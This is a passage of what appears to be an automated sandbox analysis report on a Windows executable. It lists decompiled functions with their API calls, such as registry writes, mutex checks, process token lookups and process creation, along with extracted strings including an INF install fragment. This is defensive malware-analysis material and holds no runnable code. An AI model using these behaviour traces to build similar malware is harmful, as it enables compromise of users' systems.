GetProcessHeap.KERNEL32(00000008,0000000A,00000001,00000000,76E6FE8D), ref: 0040A50C
HeapAlloc.KERNEL32(00000000), ref: 0040A50F
GetMessagePos.USER32 ref: 0040A52A
GetProcessHeap.KERNEL32(00000008,00000013), ref: 0040A593
HeapAlloc.KERNEL32(00000000), ref: 0040A596
GetCurrentThreadId.KERNEL32 ref: 0040A5AA
LoadLibraryA.KERNEL32(?), ref: 0040A5D4
GetProcAddress.KERNEL32(00000000), ref: 0040A5DB
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A5EF
HeapFree.KERNEL32(00000000), ref: 0040A5F2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A614
HeapFree.KERNEL32(00000000), ref: 0040A617

Strings

(0tX, xrefs: 0040A4F6
uTbt, xrefs: 0040A588

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040F5D9, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 95

APIs

GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0041CD20), ref: 0040F60E
HeapAlloc.KERNEL32(00000000), ref: 0040F611
GetShellWindow.USER32 ref: 0040F62D
GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F678
HeapAlloc.KERNEL32(00000000), ref: 0040F67B
GetLogicalDrives.KERNEL32 ref: 0040F68F
GetModuleHandleA.KERNEL32(0040BF20,00000000), ref: 0040F6B9
GetProcAddress.KERNEL32(00000000), ref: 0040F6C0
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F6D0
HeapFree.KERNEL32(00000000), ref: 0040F6DD
GetProcessHeap.KERNEL32(00000000,0040BF20), ref: 0040F6E2
HeapFree.KERNEL32(00000000), ref: 0040F6E9

Strings

DJF7, xrefs: 0040F66D
[##', xrefs: 0040F5EF

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00403199, Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 111

APIs

GetProcessHeap.KERNEL32(00000008,00000029), ref: 00403209
HeapAlloc.KERNEL32(00000000), ref: 00403210
GetCapture.USER32 ref: 0040321F
HeapFree.KERNEL32(00000000), ref: 004032F0

Part of subcall function 0040B964: Sleep.KERNEL32(000003E8,?,00000000,00000000,00000000,00412000,00000000,00000000,?,?,?,0040329E), ref: 0040B9AC

Sleep.KERNEL32(-0000EA60), ref: 004032C2
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004032E9

Strings

IFNo, xrefs: 004031FE
1/!&, xrefs: 004031BF
T, xrefs: 00403205
-3hc, xrefs: 004031E2
zZb~, xrefs: 004031F0
0e{u, xrefs: 004031E9
~w_T, xrefs: 004031F7

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004067FB, Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 102

APIs

GetProcessHeap.KERNEL32(00000008,00000089), ref: 004068BE
HeapAlloc.KERNEL32(00000000), ref: 004068C5
CountClipboardFormats.USER32 ref: 004068D6
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0040690F
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00406934
CloseHandle.KERNEL32(00000000), ref: 00406943
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040694E
HeapFree.KERNEL32(00000000), ref: 00406955

Strings

*7Jt, xrefs: 00406897
tnE79, xrefs: 004068F3
17\t, xrefs: 00406874
\tnE, xrefs: 004068AC
(7kt, xrefs: 00406835

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004073B6, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 94

APIs

GetProcessHeap.KERNEL32(00000008,0000000E,?,7142434B,001CFDA8), ref: 004073EF
HeapAlloc.KERNEL32(00000000), ref: 004073F2
GetLogicalDrives.KERNEL32 ref: 00407406
GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00407460
HeapAlloc.KERNEL32(00000000), ref: 00407463
IsSystemResumeAutomatic.KERNEL32 ref: 00407477
GetModuleHandleA.KERNEL32(00000000,?), ref: 004074A8
GetProcAddress.KERNEL32(00000000), ref: 004074AF
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004074BE
HeapFree.KERNEL32(00000000), ref: 004074C7
GetProcessHeap.KERNEL32(00000000,?), ref: 004074CC
HeapFree.KERNEL32(00000000), ref: 004074CF

Strings

qBc2, xrefs: 00407455

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040EE9B, Relevance: 22.8, APIs: 8, Strings: 5, Instructions: 70

APIs

GetProcessHeap.KERNEL32(00000008,00000061,76AD46E9,7142434B,76E6FE8D), ref: 0040EF0F
HeapAlloc.KERNEL32(00000000), ref: 0040EF12
GetForegroundWindow.USER32 ref: 0040EF23
OpenMutexW.KERNEL32(001F0001,00000000,00000000), ref: 0040EF58
CreateMutexW.KERNEL32(00000000,00000000,00000000), ref: 0040EF6B
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040EF73
HeapFree.KERNEL32(00000000), ref: 0040EF76
ExitProcess.KERNEL32 ref: 0040EF84

Strings

36.L, xrefs: 0040EEE6
KCBqiNhR7x, xrefs: 0040EE9B
'J56, xrefs: 0040EEED
OJG6, xrefs: 0040EF02
#6zL, xrefs: 0040EEFB

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00401560, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 107

APIs

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,?,?,?), ref: 0040107A
Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401992), ref: 0040107D
Part of subcall function 00401000: wsprintfW.USER32 ref: 00401093
Part of subcall function 00401000: lstrlenW.KERNEL32(00000000), ref: 004010A7
Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000008,00000000), ref: 004010B7
Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000), ref: 004010BA
Part of subcall function 00401000: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004010D1
Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004010F4
Part of subcall function 00401000: HeapFree.KERNEL32(00000000), ref: 004010FB

StrDupW.SHLWAPI(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401992), ref: 0040158B
GetProcessHeap.KERNEL32(00000008,00000015), ref: 004015D6
HeapAlloc.KERNEL32(00000000), ref: 004015D9
GetClipboardViewer.USER32 ref: 004015E8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401639
HeapFree.KERNEL32(00000000), ref: 0040163C

Part of subcall function 0040DD0B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0040DD37
Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD44
Part of subcall function 0040DD0B: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0040DD6B
Part of subcall function 0040DD0B: SetEndOfFile.KERNEL32(00000000,?,?,?,?,00401970,?), ref: 0040DD76
Part of subcall function 0040DD0B: GetLastError.KERNEL32(?,?,?,?,00401970,?), ref: 0040DD80
Part of subcall function 0040DD0B: SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00401970,?), ref: 0040DD95
Part of subcall function 0040DD0B: CloseHandle.KERNEL32(00000000), ref: 0040DD9C
Part of subcall function 0040DD0B: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401970,?), ref: 0040DDA9
Part of subcall function 0040DD0B: HeapFree.KERNEL32(00000000), ref: 0040DDB0

HeapFree.KERNEL32(00000000), ref: 0040167D

Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000008,0000003D,00000000,76E6FE8D,00000000), ref: 00401176
Part of subcall function 0040110C: HeapAlloc.KERNEL32(00000000), ref: 00401179
Part of subcall function 0040110C: CountClipboardFormats.USER32 ref: 0040119F
Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000008,000000C1), ref: 004012C8
Part of subcall function 0040110C: HeapAlloc.KERNEL32(00000000), ref: 004012CB
Part of subcall function 0040110C: GetDialogBaseUnits.USER32 ref: 004012EA
Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000008,00000019,00020006), ref: 00401356
Part of subcall function 0040110C: HeapAlloc.KERNEL32(00000000), ref: 00401359
Part of subcall function 0040110C: GetDialogBaseUnits.USER32 ref: 00401372
Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000008,00000019), ref: 004013C4
Part of subcall function 0040110C: HeapAlloc.KERNEL32(00000000), ref: 004013C7
Part of subcall function 0040110C: GetCurrentThreadId.KERNEL32 ref: 004013E0
Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000008,00000025), ref: 0040143F
Part of subcall function 0040110C: HeapAlloc.KERNEL32(00000000), ref: 00401442
Part of subcall function 0040110C: ReleaseCapture.USER32 ref: 00401458
Part of subcall function 0040110C: RegSetValueExW.ADVAPI32(00000006,?,00000000,00000004,00000001,00000004), ref: 0040149A
Part of subcall function 0040110C: RegSetValueExW.ADVAPI32(00000006,774C5173,00000000,00000001,?,?), ref: 004014CE
Part of subcall function 0040110C: RegSetValueExW.ADVAPI32(00000006,00000000,00000000,00000001,?,?), ref: 00401500
Part of subcall function 0040110C: RegCloseKey.ADVAPI32(00000006), ref: 00401505
Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401515
Part of subcall function 0040110C: HeapFree.KERNEL32(00000000), ref: 0040151E
Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000000,774C5173), ref: 00401524
Part of subcall function 0040110C: HeapFree.KERNEL32(00000000), ref: 00401527
Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000000,?), ref: 0040152D
Part of subcall function 0040110C: HeapFree.KERNEL32(00000000), ref: 00401530
Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000000,00000000,00020006), ref: 00401542
Part of subcall function 0040110C: HeapFree.KERNEL32(00000000), ref: 0040154B
Part of subcall function 0040110C: GetProcessHeap.KERNEL32(00000000,?), ref: 00401551
Part of subcall function 0040110C: HeapFree.KERNEL32(00000000), ref: 00401554

GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00401992), ref: 0040166C
HeapFree.KERNEL32(00000000), ref: 0040166F
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00401992), ref: 0040167A

Strings

HX82, xrefs: 004015B5
fXQ2, xrefs: 004015C9

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00420824, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 148

APIs

GetModuleFileNameW.KERNEL32(00000000,00435AE2,00000104,00000001,00000000,00000000), ref: 004208C0

Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641

_wcslen.LIBCMT ref: 004208EF
_wcslen.LIBCMT ref: 004208FC

Part of subcall function 00424851: LoadLibraryW.KERNEL32(USER32.DLL), ref: 0042488C
Part of subcall function 00424851: GetProcAddress.KERNEL32(00000000,MessageBoxW), ref: 004248A8
Part of subcall function 00424851: EncodePointer.KERNEL32(00000000), ref: 004248B9
Part of subcall function 00424851: GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 004248C6
Part of subcall function 00424851: EncodePointer.KERNEL32(00000000), ref: 004248C9
Part of subcall function 00424851: GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 004248D6
Part of subcall function 00424851: EncodePointer.KERNEL32(00000000), ref: 004248D9
Part of subcall function 00424851: GetProcAddress.KERNEL32(00000000,GetUserObjectInformationW), ref: 004248E6
Part of subcall function 00424851: EncodePointer.KERNEL32(00000000), ref: 004248E9
Part of subcall function 00424851: GetProcAddress.KERNEL32(00000000,GetProcessWindowStation), ref: 004248FA
Part of subcall function 00424851: EncodePointer.KERNEL32(00000000), ref: 004248FD
Part of subcall function 00424851: DecodePointer.KERNEL32(00000000,00435AB0,00000314,00000000), ref: 0042491F
Part of subcall function 00424851: DecodePointer.KERNEL32 ref: 00424929
Part of subcall function 00424851: DecodePointer.KERNEL32(?,00435AB0,00000314,00000000), ref: 00424968
Part of subcall function 00424851: DecodePointer.KERNEL32(?), ref: 00424982
Part of subcall function 00424851: DecodePointer.KERNEL32(00435AB0,00000314,00000000), ref: 00424996

GetStdHandle.KERNEL32(000000F4,00000001,00000000,00000000), ref: 00420972
_strlen.LIBCMT ref: 004209AF
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 004209BE

Part of subcall function 0041FFF1: IsDebuggerPresent.KERNEL32 ref: 00423AF2
Part of subcall function 0041FFF1: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00423B07
Part of subcall function 0041FFF1: UnhandledExceptionFilter.KERNEL32( cC), ref: 00423B12
Part of subcall function 0041FFF1: GetCurrentProcess.KERNEL32(C0000409), ref: 00423B2E
Part of subcall function 0041FFF1: TerminateProcess.KERNEL32(00000000), ref: 00423B35

Strings

ZC, xrefs: 004208B3
<program name unknown>, xrefs: 004208CF
Microsoft Visual C++ Runtime Library, xrefs: 00420956
..., xrefs: 00420910
Runtime Error!Program: , xrefs: 0042088E

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0040BF00, Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 113

APIs

Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000008,0000000B,?,7142434B,0041CD20), ref: 0040F60E
Part of subcall function 0040F5D9: HeapAlloc.KERNEL32(00000000), ref: 0040F611
Part of subcall function 0040F5D9: GetShellWindow.USER32 ref: 0040F62D
Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000008,0000000B), ref: 0040F678
Part of subcall function 0040F5D9: HeapAlloc.KERNEL32(00000000), ref: 0040F67B
Part of subcall function 0040F5D9: GetLogicalDrives.KERNEL32 ref: 0040F68F
Part of subcall function 0040F5D9: GetModuleHandleA.KERNEL32(0040BF20,00000000), ref: 0040F6B9
Part of subcall function 0040F5D9: GetProcAddress.KERNEL32(00000000), ref: 0040F6C0
Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040F6D0
Part of subcall function 0040F5D9: HeapFree.KERNEL32(00000000), ref: 0040F6DD
Part of subcall function 0040F5D9: GetProcessHeap.KERNEL32(00000000,0040BF20), ref: 0040F6E2
Part of subcall function 0040F5D9: HeapFree.KERNEL32(00000000), ref: 0040F6E9

Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000008,00000250,?,7142434B,0041CD20), ref: 0040BB67
Part of subcall function 0040BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BB70
Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BB86
Part of subcall function 0040BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BB89
Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000008,00000208,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BB9D
Part of subcall function 0040BB40: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20,0041CD24), ref: 0040BBA0
Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040BBE4
Part of subcall function 0040BB40: HeapAlloc.KERNEL32(00000000), ref: 0040BBE7
Part of subcall function 0040BB40: ReleaseCapture.USER32 ref: 0040BBF9
Part of subcall function 0040BB40: GetSystemDirectoryW.KERNEL32(0041CD24,00000103), ref: 0040BC4D
Part of subcall function 0040BB40: lstrcatW.KERNEL32(0041CD24,00000000), ref: 0040BC84
Part of subcall function 0040BB40: FindFirstFileW.KERNEL32(0041CD24,?), ref: 0040BC8E
Part of subcall function 0040BB40: StrRChrW.SHLWAPI(?,00000000,0000002E), ref: 0040BCD3
Part of subcall function 0040BB40: FindNextFileW.KERNEL32(?,?), ref: 0040BD84
Part of subcall function 0040BB40: FindFirstFileW.KERNEL32(0041CD24,?), ref: 0040BD90
Part of subcall function 0040BB40: FindClose.KERNEL32(?), ref: 0040BDC4
Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000000,7142434B), ref: 0040BDDB
Part of subcall function 0040BB40: HeapFree.KERNEL32(00000000), ref: 0040BDDE
Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BDE8
Part of subcall function 0040BB40: HeapFree.KERNEL32(00000000), ref: 0040BDEB
Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000000,0041CD24,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BDFA
Part of subcall function 0040BB40: HeapFree.KERNEL32(00000000), ref: 0040BDFD
Part of subcall function 0040BB40: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,0040BF42,?,0041CD20), ref: 0040BE07
Part of subcall function 0040BB40: HeapFree.KERNEL32(00000000), ref: 0040BE0A

GetProcessHeap.KERNEL32(00000008,00000015,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040BF97
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040BF9A
GetFocus.USER32 ref: 0040BFAB
lstrcatW.KERNEL32(00000000), ref: 0040BFDE
GetTickCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040C012
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,7142434B,001CFDA8), ref: 0040C042
HeapFree.KERNEL32(00000000), ref: 0040C045

Strings

mM3A, xrefs: 0040BF8C
CMVA, xrefs: 0040BF78
5m(3, xrefs: 0040BF7F
yrx), xrefs: 0040C00B

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00406F1E, Relevance: 18.1, APIs: 12, Instructions: 133

APIs

FindAtomW.KERNEL32(?), ref: 00406F8C
AddAtomW.KERNEL32(?), ref: 00406FA2
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 00406FAC
HeapAlloc.KERNEL32(00000000), ref: 00406FB3
OpenProcess.KERNEL32(00100410,00000000,?), ref: 0040701E
GetProcessImageFileNameA.PSAPI(00000000,?,00000104), ref: 00407037
CloseHandle.KERNEL32(00000000), ref: 0040703E
lstrlenA.KERNEL32(?), ref: 00407051
lstrlenA.KERNEL32(?), ref: 0040705E

Part of subcall function 0040E545: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,0040E667), ref: 0040E55F
Part of subcall function 0040E545: GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,?,0040E667), ref: 0040E58D
Part of subcall function 0040E545: HeapAlloc.KERNEL32(00000000,?,0040E667), ref: 0040E594
Part of subcall function 0040E545: GetProcessHeap.KERNEL32(00000000,00000000,?,0040E667), ref: 0040E5E9
Part of subcall function 0040E545: HeapFree.KERNEL32(00000000,?,0040E667), ref: 0040E5F0

Part of subcall function 00404AB4: OpenProcess.KERNEL32(00000400,00000000), ref: 00404AFF
Part of subcall function 00404AB4: GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00404B21
Part of subcall function 00404AB4: GetProcessHeap.KERNEL32(00000008,0000000E), ref: 00404B58
Part of subcall function 00404AB4: HeapAlloc.KERNEL32(00000000), ref: 00404B5F
Part of subcall function 00404AB4: GetForegroundWindow.USER32 ref: 00404B70
Part of subcall function 00404AB4: wsprintfA.USER32 ref: 00404BAD
Part of subcall function 00404AB4: FindAtomA.KERNEL32(?), ref: 00404BBD
Part of subcall function 00404AB4: GlobalFindAtomA.KERNEL32(?), ref: 00404BD2
Part of subcall function 00404AB4: GlobalAddAtomA.KERNEL32(?), ref: 00404BE4
Part of subcall function 00404AB4: AddAtomA.KERNEL32(?), ref: 00404BF1
Part of subcall function 00404AB4: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404BFD
Part of subcall function 00404AB4: HeapFree.KERNEL32(00000000), ref: 00404C04
Part of subcall function 00404AB4: CloseHandle.KERNEL32(?), ref: 00404C0D

Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040487E
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404881
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040489A
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040489D
Part of subcall function 0040485C: OpenProcess.KERNEL32(00000400,00000000), ref: 004048D1
Part of subcall function 0040485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00404907
Part of subcall function 0040485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00404921
Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00404942
Part of subcall function 0040485C: GetLastError.KERNEL32 ref: 00404944
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00404958
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 0040495B
Part of subcall function 0040485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00404979
Part of subcall function 0040485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0040499D
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00404A0C
Part of subcall function 0040485C: HeapAlloc.KERNEL32(00000000), ref: 00404A0F
Part of subcall function 0040485C: GetCursor.USER32 ref: 00404A20
Part of subcall function 0040485C: wsprintfW.USER32 ref: 00404A53
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404A6C
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A75
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A7C
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A7F
Part of subcall function 0040485C: CloseHandle.KERNEL32(00000000), ref: 00404A84
Part of subcall function 0040485C: CloseHandle.KERNEL32(?), ref: 00404A8D
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00404A9B
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404A9E
Part of subcall function 0040485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00404AA3
Part of subcall function 0040485C: HeapFree.KERNEL32(00000000), ref: 00404AA6

StrCmpIW.SHLWAPI(?,0041CAB0), ref: 004070AB
CreateThread.KERNEL32(00000000,00000000,Function_00004D73,?,00000000,00000000), ref: 004070BF
CloseHandle.KERNEL32(00000000), ref: 004070C6

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00401000, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108

APIs

Part of subcall function 0040A626: GetProcessHeap.KERNEL32(00000008,0000006D,?,00000000,00000000), ref: 0040A6B0
Part of subcall function 0040A626: HeapAlloc.KERNEL32(00000000), ref: 0040A6B3
Part of subcall function 0040A626: GetCurrentThreadId.KERNEL32 ref: 0040A6C5
Part of subcall function 0040A626: GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0040A717
Part of subcall function 0040A626: HeapAlloc.KERNEL32(00000000), ref: 0040A71A
Part of subcall function 0040A626: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A766
Part of subcall function 0040A626: HeapFree.KERNEL32(00000000), ref: 0040A76D

GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,?,?,?), ref: 0040107A
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,00401992), ref: 0040107D
wsprintfW.USER32 ref: 00401093
lstrlenW.KERNEL32(00000000), ref: 004010A7
GetProcessHeap.KERNEL32(00000008,00000000), ref: 004010B7
HeapAlloc.KERNEL32(00000000), ref: 004010BA
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004010D1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004010F4
HeapFree.KERNEL32(00000000), ref: 004010FB

Strings

[Version]signature = "$CHICAGO$"AdvancedINF = 2.5, "You need a new version of advpack.dll"[DefaultInstall]RunPreSetupCom, xrefs: 0040108A

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040BE1A, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 72

APIs

GetProcessHeap.KERNEL32(00000008,0000000E,76E645DF,00000000,76E6FE8D), ref: 0040BE64
HeapAlloc.KERNEL32(00000000), ref: 0040BE6B
GetFocus.USER32 ref: 0040BE7C
GetEnvironmentVariableA.KERNEL32(00000000,?,00000104), ref: 0040BEB5
lstrlenA.KERNEL32(?), ref: 0040BEC9
GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040BEEA
HeapFree.KERNEL32(00000000), ref: 0040BEF1

Strings

KCBqiNhR7x, xrefs: 0040BE1A
ZXqx, xrefs: 0040BE57
-&?7, xrefs: 0040BE37

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00423FF6, Relevance: 16.7, APIs: 11, Instructions: 163

APIs

Part of subcall function 00421381: GetLastError.KERNEL32(00000000,?,00423589,00424BAC,?,0042085F,00000003), ref: 00421385
Part of subcall function 00421381: RtlDecodePointer.NTDLL(00000000), ref: 004213C1
Part of subcall function 00421381: GetCurrentThreadId.KERNEL32(?,0042085F,00000003), ref: 004213D7
Part of subcall function 00421381: SetLastError.KERNEL32(00000000,?,0042085F,00000003), ref: 004213EF

_siglookup.LIBCMT ref: 004240A5

Part of subcall function 00424C40: Sleep.KERNEL32(00000000,00000001,?,?,00423E3E,00000018,00435890,0000000C,00423ECE,?,?,?,00421317,0000000D,?,0042085F), ref: 00424C61

Part of subcall function 00423EB3: __amsg_exit.LIBCMT ref: 00423ED5
Part of subcall function 00423EB3: RtlEnterCriticalSection.NTDLL(?), ref: 00423EDD

SetConsoleCtrlHandler.KERNEL32(Function_00004F04,00000001), ref: 00424115
GetLastError.KERNEL32(?,?,?,?,?,?,?,004358D0,00000010), ref: 00424131
RtlDecodePointer.NTDLL ref: 00424165
RtlEncodePointer.NTDLL(?), ref: 00424173
RtlDecodePointer.NTDLL ref: 00424186
RtlEncodePointer.NTDLL(?), ref: 00424194
RtlDecodePointer.NTDLL ref: 004241A7
RtlEncodePointer.NTDLL(?), ref: 004241B5
RtlDecodePointer.NTDLL ref: 004241C8
RtlEncodePointer.NTDLL(?), ref: 004241D6

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00407294, Relevance: 16.6, APIs: 11, Instructions: 101

APIs

